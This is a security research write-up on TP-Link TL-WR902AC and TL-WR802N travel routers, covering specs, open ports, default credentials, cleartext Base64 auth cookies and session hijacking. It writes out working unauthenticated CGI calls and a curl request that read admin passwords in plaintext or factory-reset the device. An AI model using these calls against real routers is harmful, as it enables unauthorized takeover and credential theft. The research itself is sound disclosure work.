Examination of TP-Link devices
Jump to navigation
Jump to search
ⓘ Table of Contents
Summary
"With a market share of over 40 percent of the global consumer WLAN market, TP-Link is the No. 1 WLAN provider." [IDC Q4/2018] The TP-Link AC750 Wifi Travel Router (TL-WR902AC FW170828) transmittes Base64 encoded username:password as Authorisation cookie on every GET/POST request over non-encrypted HTTP. In addition, this is transmitted every 20 seconds in the form of a heartbeat message. But these credentials aren't even necessary, since tons of different CGI actions, ranging from Getter and Setter to System modifications, can be called from the login screen using JavaScript Injection (e.g. Factory reset: $.act(ACT_OP, ACT_OP_FACTORY_RESET); $.act(ACT_OP, ACT_OP_REBOOT); $.exe();; Get Login Credentials: $.act(ACT_GET, USER_CFG, null, null, ["adminName", "adminPwd"]); $.exe();) without the need of any authorization.
Introduction
TP-Link is a worldwide leading manufacturer of Smart - Communication products which has made a name for itself in Europe, especially in the D-A-CH region, through efficient, reliable products and services. TP-Link Deutschland GmbH has been in existence since April 2009. Through their renowned distribution, online and retail partners, they sell an extensive range of award-winning SOHO products (WLAN, DSL, Powerline, Repeater, UMTS/LTE, print servers, IP cameras, smart home and smart phones) and SMB products (switch, router, SFP modules, media converters, network adapters). With a market share of over 40 percent of the global consumer WLAN market, TP-Link is the No. 1 WLAN provider[IDC Q4/2018]. Their goal is to provide the ever-growing number of users with products of the highest quality and performance while maintaining competitive prices, and thus remain the No.1 in the long term. In 2018, TP-Link sold 200 million devices worldwide, generating sales of around USD 2.2 billion. The company currently employs around 26,000 people worldwide (as of January 2019).
Source: [TP-Link Profile]
TL-WR902AC: AC750 Wifi - Travel Router
The incredibly compact TL-WR902AC is the world’s first AC750 travel router. It creates a personal Wi-Fi spot anywhere internet is available and transforms any internet connection into a private AC750 dual-band Wi-Fi network. The TL-WR902AC supports Router, Hotspot, Range Extender, Client and Access Point Modes.
Source: [Product]
TL-WR802N: 300Mbps Wireless N - Nano Router
The TL-WR802N is the smallest wireless router in the world. It is very easy to use and is a perfect choice for travelers, students, and anyone else who lives life on the go. The TL-WR802N can be powered using the included power adapter or using a smartphone /USB charger. To meet the wireless needs of almost any situation you might encounter, the TL-WR802N supports Router, Hotspot, Range Extender, Client and Access Point Modes.
Source: [Product]
Note: The analyzed device has Hardware V4 but the Austrian webpage only supports V1 and V2 (Link). But the German webpage supports Harware V1 to V4 (Link) like most of the other regional support webpages.
| Mode | Description |
|---|---|
| Router Mode | Create a private Wi-Fi network for Ethernet-based internet access. |
| Hotspot Mode | Connect to an outdoor WISP Access Point, enjoy a private Wi-Fi hotspot for your devices in public areas. |
| Range Extender Mode | Extend your existing Wi-Fi network to maximize coverage and eliminate dead zones. |
| Client Mode | Allow devices that require a wired connection to access an existing Wi-Fi network. |
| Access Point Mode | Create a wireless network for Wi-Fi enabled devices. |
Examination
Summary
ⓘ Collected Information
| Device Model | TL-WR902AC | TL-WR802N |
| Manufacturer | TP-Link | TP-Link |
| Product Type | AC750 Wifi Travel Router | 300 Mbps Wireless Nano Router |
| Description | Transforms any internet connection into a private AC750 dual-band Wi-Fi network | The the smallest wireless N router in the world. |
| Price on Release | 38€ | 28€ |
| Release | 2017 Q1 (Ongoing as of July 2020) | 2015 Q2 (Ongoing as of July 2020) |
| State of Research | Multiple vulnerabilities | Some vulnerabilities, Ongoing Examination |
| Ports | USB 2.0, 10/100Mbps WAN/LAN Port | 10/100 Mbps WAN/LAN Port |
| Buttons | Reset, WPS | Reset |
| LED | Power/Status, WAN, WLAN, USB | Power/Status |
| Power | 5V/2A DC | 5V/1A DC |
| WLAN | 2.4GHz: 802.11b/g/n (Up to 300Mbps), 5GHz: 802.11ac/n/a (Up to 433Mbps) | 2.4GHz: 802.11b/g/n (Up to 300Mbps) |
| Other | 3 Mode Switch | N/A |
| FCC-ID | TE7WR902ACV3 | TE7WR802NV4 |
| System | Ralink APSoC | |
| Processor | MT7628 MIPS24KEc V5.5 (580 MHz) | |
| BogoMIPS | 386.04 | |
| Memory | DRAM: 64MB (16bit) | |
| Storage | Boot from: SPI Flash GD25Q64B | |
| Ethernet MAC | 98:DA:C4:6E:00:FC | |
| WLAN MAC | 2.4GHz: 98:da:c4:6e:00:fc, 5GHz: 98:da:c4:6e:00:fd | |
| WLAN SSID | 2.4Ghz: TP-Link_00FC; 5Ghz: TP-Link_00FC_5G; TP-Link_Guest_00FC | 2.4Ghz: TP-Link_C3AE |
| WLAN PSK | 37490720 | |
| Default IPv4 | WLAN: 192.168.1.1 | |
| Hostname | TL-WR902AC | TL-WR802N |
| NET Protocols | SSH, FTP, HTTP, SMB, uPnP | SSH, HTTP, uPnP |
| Interfaces | ttyS1: console, eth0|eth0.2|eth0.3|eth0.4|eth0.5|eth0.6|br0, ra0|rai0: WLAN | |
| Ports | 21/tcp ftp, 22/tcp ssh, 80/tcp http, 139/tcp smbd, 445/tcp smbd, 1900/tcp open upnp, 1900/udp wscd: SSDP, 20002/udp httpd?, 40955/tcp upnp | 22/tcp ssh, 53/tcp dnsmasq, 80/tcp http, 1900/tcp open upnp, 1900/udp wscd: SSDP, 20002/udp httpd? |
| Webpage | http://tplink.net | |
| Webaccess | admin:admin (Default) | admin:admin (Default) |
| Root Password | N/A | N/A |
| Other Login Pw | admin:admin (Default) | admin:admin (Default) |
| Firmware | 0.9.1 0.1 v0089.0 Build 170828 Rel.57433n(4555) | 0.9.1 3.17 v0001.0 Build 190428 Rel.63523n |
| Hardware | TL-WR902AC(EU) V3 | TL-WR802N(EU) V4 |
| Baudrate | 115200 (8N1) -> 7N1 for UBoot but also works for linux, but no input | |
| Bootdelay | N/A | |
| Bootloader | U-Boot 1.1.3 || Ralink UBoot Version: 4.3.0.0 | |
| mtdparts | dev: size erasesize name mtd0: 00020000 00010000 "boot" |
|
| Filesystem | squashfs, fuse | |
| Image | TD-W8968 | |
| Linux | 2.6.36 | 2.6.36 |
| Kernel cmdline | console=ttyS1,115200 root=/dev/mtdblock2 rootfstype=squashfs init=/sbin/init | |
| Shell | sh, ash | sh, ash |
| BusyBox | v1.19.2 (2017) multi-call binary | |
| Services | vsftpd; sshd; http; smbd; uPnP, VLAN, IPv6 |
Wireless Security
In order to process with the next chapters, access to the LAN of the router is required. Since it isn't mandatory to change the Pre-Shared Key (PSK) nor the Service Set Identifier (SSID) (TP-Link_XXXX) during setup, I assume, that most general users leave its defaults. Leaving the device almost unsecured with an 8 digit ([0-9]{8}) PSK. The default PSK can be easily aquired using a deauthentication attack. Using an Intel i9-9980HK CPU with Aircrack-ng 1.6 on macOS 10.15 takes worst-case 78 minutes with 21177k/s. Using a more powerful setup with modern GPUs in combination with hashcat would drastically decrease the time brute-forcing. Leading to a attractive attack vector, even for a mobile device that doesn't stay in the same physical location for a long time.
Network Mapper
ⓘ TL-WR902AC: AC750 Wifi - Travel Router
Local Area Network
PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 2.0.8 or later |_ftp-anon: got code 500 "OOPS: no entry found!". 22/tcp open ssh Dropbear sshd 2012.55 (protocol 2.0) | ssh-hostkey: | 1024 ff:29:95:59:3a:2e:18:cd:13:7b:4f:c9:df:0f:a9:4f (DSA) |_ 1040 54:af:2a:2a:03:ae:a1:f2:c6:1c:a1:2f:85:a6:fe:1b (RSA) 80/tcp open http TP-LINK TD-W8968 http admin |_http-title: Site doesn't have a title (text/html; charset=utf-8). 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 445/tcp open netbios-ssn Samba smbd 3.0.14a (workgroup: WORKGROUP) 1900/tcp open upnp Portable SDK for UPnP devices 1.6.19 (Linux 2.6.36; UPnP 1.0) 1900/udp open wscd: SSDP Portable SDK for UPnP devices 1.6.19 (Linux 2.6.36; UPnP 1.0) 20002/udp open httpd? UPD hello messages. 40955/tcp open upnp Portable SDK for UPnP devices 1.6.19 (Linux 2.6.36; UPnP 1.0) Service Info: Host: TP-Link; OS: Linux; Device: WAP; CPE: cpe:/o:linux:linux_kernel, cpe:/h:tp-link:td-w8968, cpe:/o:linux:linux_kernel:2.6.36 Host script results: |_clock-skew: mean: -18432d18h23m26s, deviation: 0s, median: -18432d18h23m26s | smb-os-discovery: | OS: Unix (Samba 3.0.14a) | NetBIOS computer name: | Workgroup: WORKGROUP\x00 |_ System time: 1970-01-01T00:03:48+00:00 | smb-security-mode: | account_used: guest | authentication_level: share (dangerous) | challenge_response: supported |_ message_signing: disabled (dangerous, but default) |_smb2-time: Protocol negotiation failed (SMB2)
Wide Area Network (WAN)
Host is up.
ⓘ TL-WR802N: 300Mbps Wireless N - Nano Router
Local Area Network
PORT STATE SERVICE VERSION 22/tcp open ssh Dropbear sshd 2012.55 (protocol 2.0) | ssh-hostkey: | 1024 c5:2f:17:05:d0:da:57:ea:16:d8:4c:c3:14:a6:b3:c9 (DSA) |_ 1039 6c:06:ba:de:54:2d:05:02:f9:79:a6:79:2e:64:9f:96 (RSA) 53/tcp open domain dnsmasq 2.78 | dns-nsid: | NSID: viezcnsat10 (7669657a636e7361743130) | id.server: viezcnsat10 |_ bind.version: dnsmasq-2.78 80/tcp open http | fingerprint-strings: | GetRequest: | HTTP/1.1 200 OK | Content-Type: text/html; charset=utf-8 | Content-Length: 16113 | Set-Cookie: JSESSIONID=deleted; Expires=Thu, 01 Jan 1970 00:00:01 GMT; Path=/; HttpOnly | Connection: keep-alive | HTTPOptions, RTSPRequest: | HTTP/1.1 405 Method Not Allowed | Content-Type: text/html; charset=utf-8 | Content-Length: 124 | Set-Cookie: JSESSIONID=deleted; Expires=Thu, 01 Jan 1970 00:00:01 GMT; Path=/; HttpOnly |_ Connection: close |_http-title: Site doesn't have a title (text/html; charset=utf-8). 1900/tcp open upnp Portable SDK for UPnP devices 1.6.19 (Linux 2.6.36; UPnP 1.0) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel, cpe:/o:linux:linux_kernel:2.6.36
Wide Area Network (WAN)
Host is up.
Spoiler: The username and password are shared between http, ftp, ssh and smb services. It is set via Web interface and stored in the passwd file. The default credentials are
admin:admin.Secure shell (SSH)
ⓘ TL-WR902AC: AC750 Wifi - Travel Router
TL-WR802N$ ssh admin@192.168.0.1 admin@192.168.0.1's password: admin PTY allocation request failed on channel 0 shell request failed on channel 0 TL-WR802N$ scp admin@192.168.0.1:/etc/passwd ./tmp/ admin@192.168.0.1's password: admin exec request failed on channel 0
Note:
PTY allocation request failed indicated that the login was successful, but the devices provides no interctive shell. This can be seen using the -vvv debugging mode with ssh.To help customers manage and configure the TP-Link device better, some TP-Link apps are published for mobile devices, such as Tether 2.0 app, Deco app, Tapo app, and tpCamera app, etc. The TP-Link app adopts SSH service, so the products that can use the app also support SSH correspondingly. And TCP port 22 as the default port of SSH Service is set to be opened. However, SSH Services on the TP-Link products are only available for TP-Link apps. Other SSH clients cannot access to TP-Link products or adjust their settings with command lines. So please rest assured that the SSH will never cause any safety issues on your device.
Source: [Support]
Note: While the dropbear package provides SCP functionality, it does not contain anything for SFTP.
File Transfer Protocol (FTP)
ⓘ TL-WR902AC: AC750 Wifi - Travel Router
TL-WR802N$ ftp 192.168.1.1 21 Connected to 192.168.1.1. 220 Welcome to TP-Link FTP server Name (192.168.1.1): admin 331 Please specify the password. Password: admin 230 Login successful. Remote system type is UNIX. Using binary mode to transfer files. ftp> pwd 257 "/" ftp> dir 200 PORT command successful. Consider using PASV. 150 Here comes the directory listing. 226 Directory send OK. ftp>
Note: The FTP server maps to USB Volumes which can be configured on the webpage. The default FTP root is therefore empty.
Note: FTP ends up in an empty root directory using the credentials
admin:admin.Server Message Block (SMB)
ⓘ Note: Ongoing Investigation
TL-WR802N$ smbclient -L 192.168.1.1 -U admin Unable to initialize messaging context Enter WORKGROUP\admin's password: Server requested LANMAN password (share-level security) but 'client lanman auth = no' or 'client ntlmv2 auth = yes' tree connect failed: NT_STATUS_ACCESS_DENIED
⚒
Universal Plug and Play (UPnP)
ⓘ Note: Ongoing Investigation
TP-Link Device Debug Protocol (TDDP)
ⓘ Note: Ongoing Investigation
The TP-Link Device Debug Protocol (TDDP) is in use across most of the TP-Link product line including routers and access points.
- https://www.softscheck.com/en/reverse-engineering-tp-link-hs110/
- https://hackaday.com/2016/12/14/tp-link-debug-protocol-give-up-keys-to-kingdom/
- https://github.com/P0lako/tl-wa5210gV2_Downgrade
- https://www.zdnet.com/article/google-dev-discloses-zero-day-flaw-in-tp-link-smart-home-routers/
Such downgrade would be the only interesting attack in combination with all these vulnerability issues in FWv1
⚒Note: Requires in-depth investigation!
Web Interface
The device can be managed through a web interface or via mobile APP. The web interface is accessible over HTTP an requires authorization to access. The device provides an initial setup process, where a user could change credentails and WLAN passwords from its defaults, but doesn't enforce any changes. TP-Link use a custom http daemon including an CGI interface.
Note: Webpage provides no encrypted connection.
Note: No responsive design and almost useless on the phone, mobile users "should" use the mobile app.
Authentication Bypass
Warning: The user name and password can be changed.
Both must not exceed 15 characters in length and must not include any spaces. 32 characters on the newer firmware.
Both must not exceed 15 characters in length and must not include any spaces. 32 characters on the newer firmware.
Using Cookies
The login process at the TP-WR902AC with the FW version 170828 is quite primitive. The function
PCSubWin() is called by clicking the login button. This function does not communicate directly with the server, but creates an Authorization Cookie based on the content of the Username and Password field. The cookie is a Basic HTTP authentication, where username:password Base64 is encoded and stored as a cookie. (Example: Authorization=Basic YWRtaW46YWRtaW4= Afterwards the page is reloaded. If the authentication is successful, you will be transferred to the user interface. Otherwise the faulty cookie will be removed and the login page will be reloaded.var auth;
var password = "admin"; //$.id("pcPassword").value;
var userName = "admin"; //$.id("userName").value;
auth = "Basic "+Base64Encoding(userName+":"+password);
document.cookie = "Authorization=" + auth;
window.location.reload();
Note: Login limited to 10 attempts
Note: The router allows only one administrator to login at the same time
This Authorization Cookie is transferred on every interaction with the server. Since the website does not offer a secure connection via HTTPS, it is very easy to intercept it by a MitM attack and finally decode Base64. This gives access to FTP, SSH and HTTP services due to the shared login. However, this requires a user who is currently active in the web interface. It should be noted that some web pages like the index page additionally reload the web page content (
/main/status.html?_=$TIMESTAMP) every 20 seconds and thus retransmit the cookie.$ echo YWRtaW46YWRtaW4= | base64 --decode admin:admin
Using Session hijacking
The TP-WR802N with the new FW version 190428 doesn't use Authorisation Cookies anymore. It uses
JSESSIONID cookies as well as AES encrypted payload instead. But still supports HTTP only, which makes it still possible to easily hijack the ongoing session, but prevents to leak the credentials. It is very interesting to notice is that the Server send all necessary parameters to generate the AES encryption key in response to an unauthorized CGI call ($.act(ACT_CGI, "/cgi/getParm"); $.exe(null,false,0);), which can be re-called at any point of time. Note that nn changes on reboot and seq on every request.Note: The Results of CGI calls are automatically parsed and accessable using JavaScript after executing
$.exe(). Example: $.retⓘ TL-WR802N: Login process
$.act(ACT_CGI, "/cgi/getParm");
$.exe(null,false,0);
# Request Parameters
# [/cgi/getParm#0,0,0,0,0,0#0,0,0,0,0,0]0,0
# Example Response
# lib.js:396 XHR finished loading: POST "http://192.168.1.1/cgi?8"
# [cgi]0
# var ee="010001";
# var nn="BF52337CDDC3F46ADE7663765F170AB464AE93BF981B02B95FCE1E94" +
# "62DD9A03ED3E09CCEFDFD7FACE81EE38136FC081735686FE630BBADB" +
# "DAB24BE0443A2B25";
# var seq="812508797";
# $.ret=0;
# [error]0
$.nn = nn;
$.ee = ee;
$.seq = seq;
$.Iencryptor.setSeq($.seq);
$.Iencryptor.setRSAKey($.nn, $.ee);
$.Iencryptor.setHash(userName, password);
$.Iencryptor.genAESKey();
var credentials = {};
credentials.username = "admin"; //$.id("pcPassword").value;
credentials.password = "admin"; //$.id("userName").value;
$.act(ACT_CGI, "/cgi/login", null, null, credentials);
$.newencryptorManager.recordEncryptor();
if(!$.exe(null, false, 1)) {
window.location.reload();
}
Using unauthenticated CGI calls
As if that wasn't enough, it is even possible to retrieve the Admin Credentials in plain text. This is possible without authentication and can be done at any time. All that is needed is a call to the corresponding Common Gateway Interface (CGI) object via JavaScript injection.
ⓘ Get All User Information
$.act(ACT_GET, USER_CFG); $.act(ACT_GET, CURRENT_USER); $.exe();
[0,0,0,0,0,0]0
rootName=
rootPwd=
adminName=admin
adminPwd=admin
userName=
userPwd=
[0,0,0,0,0,0]1
userName=
passwd=
httpSession=
userSetting=0
action=0
loginStatus=0
userRole=3
logInCloud=0
needReconn=0
[error]0
ⓘ Get admin username and password
$.act(ACT_GET, USER_CFG, null, null, ["adminName", "adminPwd"]); $.exe();
// Or, by using cURL for once
// curl -X POST "http://192.168.1.1/cgi?1" -H "Referer: http://192.168.1.1" -d $'[USER_CFG#0,0,0,0,0,0#0,0,0,0,0,0]0,2\r\nadminName\r\nadminPwd\r\n'
[0,0,0,0,0,0]0
adminName=admin
adminPwd=admin
[error]0
Common Gateway Interface
The devices examined here use a CGI over http on port 80, which are evaluated by the TP-Link https daemon. The mobile app uses SSH over port 22 instead. When working with the CGI it is of great use to use the predefined functions
$.act() and $.exe() via the browser console. These functions are part of the lib.js and then take care of converting the request into a format that is accepted by the server, and subsequently submit the request via AJAX using the $.io() function. Using these functions is much more convenient, than imitating the format itself. The $.act(type, oid, stack, pStack, attrs) function has 2 mandatory fields. The type of the request and an object identifier (oid). Several requests can be pushed to the stack using $.act() and then be queried together in one request using $.exe(). The type is added to the URL (/cgi?1&2&3) as a numeric GET parameter. The oid is added as a string in a parameter, in the form [oid,0,0,0,0]0,0, to the payload. The remaining fields are not explained in detail. If attributes (attr) are also sent, they are appended after the parameter of the payload. Several attributes will be transferred according to the number of added type. A list of available types and OIDs and a shortened form of the lib.js is listed below in the Client-side CGI Insights tab. When analyzing the website, countless examples of using the mentioned functions can be found. Anyhow, the lib.js and oid_str.js are of great interest.// Example Format
URL: http://192.168.1.1/cgi?5&1&1
Payload:
[oid,0,0,0,0,0,0]0,0
[oid,0,0,0,0,0,0,0]0,count(attr)
attr[1]
attr[2]
attr[3]
[USER_CFG#0,0,0,0,0,0#0,0,0,0,0,0,0]0,2
adminName
adminPwd
Warning: If not using a modified $.io() function logging results to the console or similar, the responses must be found in the browsers network tab or Wireshark, depending on the setup.
Client-side CGI Insights
ⓘ TL-WR902AC FW170828
ⓘ Strongly Reduced version of the lib.js, showing the $.cgi, $.act and $.exe methods.
# lib_modified.js
(function(){
var window = this,
window.$ = {
cgi: function(path, arg, hook, noquit, unerr) {
var expr = /(^|\/)(\w+)\.htm$/;
if ($.local || $.sim) path = $.params;
else path = (path ? path : $.curPage.replace(/\.htm$/, ".cgi")) + (arg ? "?" + $.toStr(arg, "=", "&") : "");
$.ret = 0;
var func = hook ? function(ret) {if (!ret && (ret = $.ret)) $.err("cgi", $.ret, unerr); if (typeof hook === "function") hook(ret);} : null;
var ret = $.io(path, true, func, null, noquit, unerr);
if (!ret && (ret = $.ret))
$.err("cgi", $.ret, unerr);
return ret;
},
act: function(type, oid, stack, pStack, attrs) {
stack = stack ? stack : "0,0,0,0,0,0";
pStack = pStack ? pStack : "0,0,0,0,0,0";
attrs = $.toStr(attrs, "=", "\r\n", true);
attrs = attrs.replace(/__stack=[0-9,]*\r\n/, "");
var ret = null;
switch (type) {
case ACT_ADD:
if ($.cn) attrs = $.ansi(attrs);
case ACT_GET:
ret = {};
break;
case ACT_GL:
case ACT_GS:
ret = [];
break;
case ACT_SET:
case ACT_CGI:
oid = oid ? oid : $.curPage.replace(/\.htm$/, ".cgi");
if ($.cn) attrs = $.ansi(attrs);
case ACT_DEL:
case ACT_OP:
break;
default:
return false;
}
$.as.push([type, null, oid, stack, pStack, attrs, attrs ? attrs.match(/\r\n/g).length : 0]);
$.ds.push(ret);
return ret;
},
exe: function(hook, unerr) {
var url = "/cgi?";
var data = "";
var index = 0;
var obj;
var bAnsi = false;
if ($.as.length == 0 || $.local || $.sim) {
if (hook && typeof hook === "function") $.timeout(hook, 200);
while($.as.pop() !== undefined);
while($.ds.pop() !== undefined);
return 0;
}
$.empty($.id("ansiform"));
while ($.ansiarg.length) {
obj = $.ansiarg.shift();
$.append($.id("ansiform"), "<input type='hidden' name='"+obj[0]+"' value='"+obj[1].replace(/\&/g, "&").replace(/</g, "<").replace(/'/g, "'")+"' />");
bAnsi = true;
}
while(obj = $.as.shift()){
url += obj[0] + (obj[1] ? "=" + obj[1] : "") + "&";
data += "[" + obj[2] + "#" + obj[3] + "#" + obj[4] + "]" + index + ", " + obj[6] + "\r\n" + obj[5];
index++;
}
url = url.substr(0, url.length - 1);
if (hook) {
var tmpds = $.mkArr($.ds);
while($.ds.length) $.ds.pop();
}
var resolve = function(ret, ds) {
if (typeof ret !== "number") {
var lines = ret.split('\n');
ret = 0;
$.ret = 0;
var scripts = "";
for (var i = 0, l = lines.length; i < l; i++) {
if (lines[i] == "") continue;
if (lines[i].charAt(0) == "[") {
if (scripts != "") {
$.script(scripts);
if ($.ret) {
ret = $.ret;
$.err("cgi", ret, unerr);
break;
}
scripts = "";
}
var n = lines[i].indexOf("]");
var j = parseInt(lines[i].substr(n+1), 10);
var stack = lines[i].substr(1, n-1);
var instance;
if (stack == "error") {
if (j) {
ret = j;
if (ret != ERR_HTTP_ERR_CGI_INVALID_ANSI) $.err("exe", ret, unerr);
break;
}
}
else if (ds[j] instanceof Array) {
instance = {__stack: stack};
ds[j].push(instance);
}
else if (ds[j] != null) {
instance = ds[j];
instance.__stack = stack;
}
}
else {
if (stack == "cgi") {
scripts += lines[i] + '\n';
}
else {
var attr = lines[i].split("=");
instance[attr[0]] = attr.slice(1).join('=');
}
}
}
}
while(ds.length) ds.pop();
return ret;
}
if (bAnsi) {
var formObj = $.d.forms[0];
try {
formObj.target = "up_frame";
formObj.action = "/cgi/ansi";
formObj.submit();
}catch(e){}
}
if (hook) {
var resolve2 = function(){
$.io(url, false, function(ret){
ret = resolve(ret, tmpds);
if (typeof hook === "function") hook(ret);
}, data, false, unerr)
};
if (bAnsi) $.timeout(resolve2, 100);
else resolve2();
return 0;
}
else {
while(ret = $.io(url, false, null, data, false, unerr)) {
ret = resolve(ret, $.ds);
if (ret != ERR_HTTP_ERR_CGI_INVALID_ANSI) return ret;
count++;
if (count > 3) return $.err("exe", ERR_HTTP_ERR_CGI_INVALID_ANSI, unerr);
}
}
}
};
})();
ⓘ CGI parameters extracted from lib.js and oid_str.js
// Type
var ACT_GET = 1; //----
var ACT_SET = 2; //----
var ACT_ADD = 3;
var ACT_DEL = 4;
var ACT_GL = 5;
var ACT_GS = 6;
var ACT_OP = 7; //----
var ACT_CGI = 8; //----
// Operations
var ACT_OP_REBOOT = "ACT_REBOOT"; //----
var ACT_OP_FACTORY_RESET = "ACT_FACTORY_RESET"; //----
var ACT_OP_DHCP_RENEW = "ACT_DHCP_RENEW";
var ACT_OP_DHCP_RELEASE = "ACT_DHCP_RELEASE";
var ACT_OP_PPP_CONN = "ACT_PPP_CONN";
var ACT_OP_PPP_DISCONN = "ACT_PPP_DISCONN";
var ACT_OP_WLAN_GET_NEW_PIN = "ACT_WLAN_GET_NEW_PIN";
var ACT_OP_WLAN_RESTORE_PIN = "ACT_WLAN_RESTORE_PIN";
var ACT_OP_WLAN_UPDATE_ASSOC = "ACT_WLAN_UPDATE_ASSOC";
var ACT_OP_WLAN_WPS_PBC = "ACT_WLAN_WPS_PBC";
var ACT_OP_WLAN_WPS_PIN = "ACT_WLAN_WPS_PIN";
var ACT_OP_WLAN_SCAN = "ACT_WLAN_SCAN";
var ACT_OP_NTP_REQUEST = "ACT_NTP_REQUEST";
var ACT_OP_DLNA_MANUAL_SCAN = "ACT_DLNA_MANUAL_SCAN";
var ACT_OP_L2TP_CONN = "ACT_L2TP_CONN";
var ACT_OP_L2TP_DISCONN = "ACT_L2TP_DISCONN";
var ACT_OP_PPTP_CONN = "ACT_PPTP_CONN";
var ACT_OP_PPTP_DISCONN = "ACT_PPTP_DISCONN";
var ACT_OP_WAN_TYPE_DETECT = "ACT_WAN_TYPE_DETECT";
var ACT_OP_BPA_CONN = "ACT_BPA_CONN";
var ACT_OP_BPA_DISCONN = "ACT_BPA_DISCONN";
var ACT_OP_IPPING = "ACT_OP_IPPING";
var ACT_OP_TRACERT = "ACT_OP_TRACERT";
// Object Identifier
var IGD = "IGD"
var IGD_DEV_INFO = "IGD_DEV_INFO" //----
var SYSLOG_CFG = "SYSLOG_CFG"
var MANAGEMENT_SERVER = "MANAGEMENT_SERVER"
var ETH_SWITCH = "ETH_SWITCH"
var SYS_CFG = "SYS_CFG"
var NET_CFG = "NET_CFG"
var USER_CFG = "USER_CFG" //----
var CURRENT_USER = "CURRENT_USER"
var APP_CFG = "APP_CFG"
var HTTP_CFG = "HTTP_CFG"
var PH_DDNS_CFG = "PH_DDNS_CFG"
var PH_RT_DATA = "PH_RT_DATA"
var DYN_DNS_CFG = "DYN_DNS_CFG"
var UPNP_CFG = "UPNP_CFG"
var UPNP_PORTMAPPING = "UPNP_PORTMAPPING"
var DIAG_TOOL = "DIAG_TOOL"
var CWMP_CFG = "CWMP_CFG"
var SNMP_CFG = "SNMP_CFG"
var NOIP_DNS_CFG = "NOIP_DNS_CFG"
var CMX_DNS_CFG = "CMX_DNS_CFG"
var ACL_CFG = "ACL_CFG"
var WAN_TYPE_DETECT = "WAN_TYPE_DETECT"
var DMZ_HOST_CFG = "DMZ_HOST_CFG"
var TIME = "TIME"
var HOUR = "HOUR"
var L3_FORWARDING = "L3_FORWARDING"
var L3_FORWARDING_ENTRY = "L3_FORWARDING_ENTRY"
var L3_IP6_FORWARDING = "L3_IP6_FORWARDING"
var L3_IP6_FORWARDING_ENTRY = "L3_IP6_FORWARDING_ENTRY"
var L2_BRIDGING = "L2_BRIDGING"
var L2_BRIDGING_ENTRY = "L2_BRIDGING_ENTRY"
var L2_BRIDGING_FILTER = "L2_BRIDGING_FILTER"
var L2_BRIDGING_INTF = "L2_BRIDGING_INTF"
var LAN_DEV = "LAN_DEV"
var LAN_HOST_CFG = "LAN_HOST_CFG"
var LAN_IP_INTF = "LAN_IP_INTF"
var LAN_DHCP_STATIC_ADDR = "LAN_DHCP_STATIC_ADDR"
var LAN_DHCP_COND_SRV_POOL = "LAN_DHCP_COND_SRV_POOL"
var LAN_DHCP_COND_SRV_POOL_OPT = "LAN_DHCP_COND_SRV_POOL_OPT"
var YANDEX_DNS_POOL = "YANDEX_DNS_POOL"
var LAN_IP6_HOST_CFG = "LAN_IP6_HOST_CFG"
var LAN_IP6_INTF = "LAN_IP6_INTF"
var LAN_ETH_INTF = "LAN_ETH_INTF"
var LAN_HOSTS = "LAN_HOSTS"
var LAN_HOST_ENTRY = "LAN_HOST_ENTRY"
var LAN_WLAN = "LAN_WLAN"
var LAN_WLAN_WPS = "LAN_WLAN_WPS"
var LAN_WLAN_MACTABLEENTRY = "LAN_WLAN_MACTABLEENTRY"
var LAN_WLAN_ASSOC_DEV = "LAN_WLAN_ASSOC_DEV"
var LAN_WLAN_BSSDESC_ENTRY = "LAN_WLAN_BSSDESC_ENTRY"
var LAN_WLAN_WEPKEY = "LAN_WLAN_WEPKEY"
var LAN_WLAN_WDSBRIDGE = "LAN_WLAN_WDSBRIDGE"
var LAN_WLAN_MULTISSID = "LAN_WLAN_MULTISSID"
var LAN_WLAN_MSSIDENTRY = "LAN_WLAN_MSSIDENTRY"
var LAN_WLAN_MSSIDWEPKEY = "LAN_WLAN_MSSIDWEPKEY"
var MSSID_MACTABLEENTRY = "MSSID_MACTABLEENTRY"
var LAN_WLAN_WLBRNAME = "LAN_WLAN_WLBRNAME"
var LAN_WLAN_TASK_SCHEDULE = "LAN_WLAN_TASK_SCHEDULE"
var LAN_WLAN_QUICKSAVE = "LAN_WLAN_QUICKSAVE"
var LAN_WLAN_GUESTNET = "LAN_WLAN_GUESTNET"
var LAN_IGMP_SNOOP = "LAN_IGMP_SNOOP"
var WAN_DEV = "WAN_DEV"
var WAN_COMMON_INTF_CFG = "WAN_COMMON_INTF_CFG"
var WAN_DSL_INTF_CFG = "WAN_DSL_INTF_CFG"
var WAN_DSL_INTF_STATS = "WAN_DSL_INTF_STATS"
var WAN_DSL_INTF_STATS_TOTAL = "WAN_DSL_INTF_STATS_TOTAL"
var WAN_DSL_AUTOPVC = "WAN_DSL_AUTOPVC"
var WAN_DSL_AUTO_PVC_PAIR = "WAN_DSL_AUTO_PVC_PAIR"
var WAN_ETH_INTF = "WAN_ETH_INTF"
var WAN_ETH_INTF_STATS = "WAN_ETH_INTF_STATS"
var WAN_PON = "WAN_PON"
var WAN_EPON_INTF = "WAN_EPON_INTF"
var WAN_EPON_INTF_OAM_STATS = "WAN_EPON_INTF_OAM_STATS"
var WAN_EPON_INTF_MPCP_STATS = "WAN_EPON_INTF_MPCP_STATS"
var WAN_EPON_INTF_STATS = "WAN_EPON_INTF_STATS"
var WAN_EPON_INTF_OPTICAL_STATS = "WAN_EPON_INTF_OPTICAL_STATS"
var WAN_GPON_INTF = "WAN_GPON_INTF"
var WAN_GPON_INTF_OMCI_STATS = "WAN_GPON_INTF_OMCI_STATS"
var WAN_GPON_INTF_STATS = "WAN_GPON_INTF_STATS"
var WAN_GPON_INTF_OPTICAL_STATS = "WAN_GPON_INTF_OPTICAL_STATS"
var WAN_CONN_DEVICE = "WAN_CONN_DEVICE"
var WAN_DSL_LINK_CFG = "WAN_DSL_LINK_CFG"
var WAN_PON_LINK_CFG = "WAN_PON_LINK_CFG"
var WAN_ETH_LINK_CFG = "WAN_ETH_LINK_CFG"
var WAN_USB_3G_LINK_CFG = "WAN_USB_3G_LINK_CFG"
var USB_MODEM_PARAM = "USB_MODEM_PARAM"
var WAN_L2TP_CONN = "WAN_L2TP_CONN"
var WAN_L2TP_CONN_PORTMAPPING = "WAN_L2TP_CONN_PORTMAPPING"
var L2TP_CONN_PORTTRIGGERING = "L2TP_CONN_PORTTRIGGERING"
var WAN_L2TP_CONN_STATS = "WAN_L2TP_CONN_STATS"
